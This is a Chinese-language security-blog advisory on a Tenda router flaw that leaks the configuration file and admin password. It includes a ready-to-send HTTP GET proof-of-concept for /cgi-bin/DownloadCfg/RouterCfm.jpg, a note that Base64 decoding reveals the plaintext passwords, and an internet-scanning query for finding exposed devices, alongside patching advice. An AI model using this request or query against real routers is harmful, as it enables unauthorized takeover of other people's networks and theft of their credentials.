文章总结: 本文披露腾达路由器存在高危敏感信息泄露漏洞,攻击者访问特定路径可下载配置文件并解码获取管理员明文密码。全网测绘显示大量设备受影响,风险极高。文章提供了复现POC及技术细节,建议用户立即更新固件、修改复杂密码并升级WiFi加密方式,以防范未授权访问与数据泄露风险。
综合评分: 85
文章分类: 漏洞预警,漏洞POC,IoT安全,渗透测试
【漏洞复现】腾达路由器曝敏感信息泄露漏洞,可直接获取管理密码。
原创
xuzhiyang
xuzhiyang
玄武盾网络技术实验室
2026年2月12日 14:25
江西
*免责声明:本文仅供安全研究与学习之用,严禁使用本内容进行未经授权的违规渗透测试,遵守网络安全法,共同维护网络安全,违者后果自负。
腾达作为国内知名的网络设备品牌,路由器产品覆盖家用高性价比、中大户型全屋覆盖、企业商用组网等全场景,现阶段主打 Wi-Fi 7 技术,兼顾信号、速率、组网便捷性。
一、漏洞名称
#
腾达路由器敏感信息泄露高危漏洞。
二、影响范围
#
腾达多款家用、商用无线路由器产品(目前全网测绘显示大量在线设备存在该漏洞风险,涉及国内多省市及海外部分地区)
三、漏洞核心危害
#
腾达作为国内知名网络设备厂商,其路由器凭借高性价比、易部署的特点,广泛应用于家庭、中小企业等场景,是很多用户的网络 “第一道门”。但本次曝光的漏洞,直接让这道 “门” 成了不设防的状态!
攻击者只需通过访问路由器特定路径/cgi-bin/DownloadCfg/RouterCfm.jpg,即可直接获取路由器完整配置文件。文件中包含的管理员账号密码等敏感信息,虽经简单加密处理,但通过 Base64 解码就能直接得到明文密码。
一旦被利用,黑客可直接登录路由器后台,篡改网络设置、窃取网络内设备数据,甚至进一步获取路由器 Root 管理权限,完全掌控整个网络,后续可能引发家庭隐私泄露、企业数据被盗、设备被植入恶意程序等一系列严重后果。
四、全网资产测绘情况
#
通过网络资产测绘平台检索:
title="Tenda | Login"
发现全网存在大量受影响的腾达路由器设备,仅国内核心城市就有上万台在线设备暴露风险,涉及 80、8080、8081 等常用端口,服务器标识多为 GoAhead-Webs。
从地域分布来看,国内北京、上海、广东等省市为高危区域,海外伊拉克、印度、俄罗斯等国也有不少设备存在漏洞,且部分设备未做任何网络防护,直接暴露在公网环境中,被攻击的概率大幅提升。
五、 漏洞复现(技术细节)
#
本次漏洞利用门槛极低,无需复杂工具,仅通过简单的 HTTP 请求即可实现,以下为核心 POC 请求包(仅供安全人员检测使用,禁止非法利用):
GET /cgi-bin/DownloadCfg/RouterCfm.jpg HTTP/1.1Host: xxx.xx.xxx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept: */*Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brConnection: keep-alive
发送请求后,路由器会直接返回配置文件,在返回内容中可直接找到wlwpa_psk(WiFi 密码)、http passwd(后台管理密码)等关键字段,其中加密的密码字段经 Base64 在线工具解码后,即可得到明文,攻击者凭此就能直接登录路由器管理后台。
六、紧急修复与防护建议
#
1、更新固件至最新版本:
这是最核心的修复方式!腾达官方已发布最新固件修复该漏洞,用户可通过腾达路由器管理后台(通常为 192.168.0.1/192.168.1.1)或官方 Tenda WiFi APP,检查并一键更新固件。
2、立即修改管理员密码:
即使暂未更新固件,需立即修改路由器后台管理员账号和密码,避免使用admin等默认密码,密码需满足大小写字母 + 数字 + 特殊符号的复杂组合,且与 WiFi 密码不重复。
3、修改 WiFi 密码并升级加密:
将 WiFi 加密方式改为 WPA3-PSK(无此选项则选 WPA2-PSK (AES)),彻底禁用 WEP 加密,同时修改高强度 WiFi 密码,关闭 WPS/QSS 功能,封堵 PIN 码破解漏洞。
随手点个「推荐」吧!
声明:技术文章均收集于互联网,仅作为本人学习、记录使用。侵权删!!
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:玄武盾网络技术实验室 xuzhiyang
xuzhiyang《【漏洞复现】腾达路由器曝敏感信息泄露漏洞,可直接获取管理密码。》